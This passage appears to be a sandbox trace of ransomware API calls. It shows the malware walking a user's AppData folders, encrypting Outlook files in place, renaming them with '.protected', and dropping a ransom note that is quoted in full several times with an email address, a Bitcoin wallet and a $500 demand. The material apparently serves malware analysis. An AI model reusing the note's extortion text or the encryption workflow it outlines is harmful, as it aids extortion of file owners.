dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.234] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.234] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.235] lstrlenA (lpString="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") returned 684 [0090.235] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.235] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.235] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.235] CloseHandle (hObject=0x14c) returned 1 [0090.236] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.236] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.236] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RESTORE_FILES.txt") returned 84 [0090.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.237] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.237] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.238] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.238] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.238] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.238] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.238] CloseHandle (hObject=0xd8) returned 1 [0090.238] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Windows") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Program Files") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Program Files (x86)") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="$Recycle.bin") returned 1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="System Volume Information") returned -1 [0090.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned 67 [0090.238] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0090.238] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0090.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned 69 [0090.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.239] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0090.239] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.240] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\.") returned 69 [0090.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.240] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.240] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\..") returned 70 [0090.240] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.240] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.240] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Windows") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="System Volume Information") returned -1 [0090.240] 
wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.240] StrStrIW (lpFirst="Outlook.srs", lpSrch=".protected") returned 0x0 [0090.240] lstrcmpW (lpString1="Outlook.srs", lpString2="RESTORE_FILES.txt") returned -1 [0090.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.241] StrStrW (lpFirst="Outlook.srs", lpSrch=".txt") returned 0x0 [0090.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.242] StrStrW (lpFirst="Outlook.srs", lpSrch=".rar") returned 0x0 [0090.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.242] StrStrW (lpFirst="Outlook.srs", lpSrch=".zip") returned 0x0 [0090.242] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa00, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff600, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa00, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.287] CloseHandle (hObject=0x14c) returned 1 [0090.287] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.protected") returned 89 [0090.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.protected")) returned 1 [0090.288] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="Windows") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="Program Files") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", 
lpString2="Program Files (x86)") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="$Recycle.bin") returned 1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="System Volume Information") returned -1 [0090.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.289] StrStrIW (lpFirst="Outlook.xml", lpSrch=".protected") returned 0x0 [0090.289] lstrcmpW (lpString1="Outlook.xml", lpString2="RESTORE_FILES.txt") returned -1 [0090.289] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.289] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".txt") returned 0x0 [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".rar") returned 0x0 [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".zip") returned 0x0 [0090.290] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x9a2, lpOverlapped=0x0) returned 1 [0090.295] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff65e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.295] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x9a2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x9a2, lpOverlapped=0x0) returned 1 [0090.295] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.295] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.296] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.296] CloseHandle (hObject=0x14c) returned 1 [0090.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.protected") returned 89 [0090.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.protected")) returned 1 [0090.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) 
returned 0 [0090.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\RESTORE_FILES.txt") returned 85 [0090.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.307] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.307] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.307] lstrlenA (lpString="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") returned 684 [0090.308] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.308] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.308] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.308] CloseHandle (hObject=0xd8) returned 1 [0090.308] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Windows") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Program Files") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Program Files (x86)") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="$Recycle.bin") returned 1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="System Volume Information") returned -1 [0090.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned 70 [0090.308] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0090.308] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0090.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned 72 [0090.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.309] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\.") returned 72 [0090.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0090.309] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.310] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\..") returned 73 [0090.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.310] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.310] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.310] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\RESTORE_FILES.txt") returned 88 [0090.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.311] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.311] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.311] lstrlenA (lpString="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") returned 684 [0090.311] WriteFile 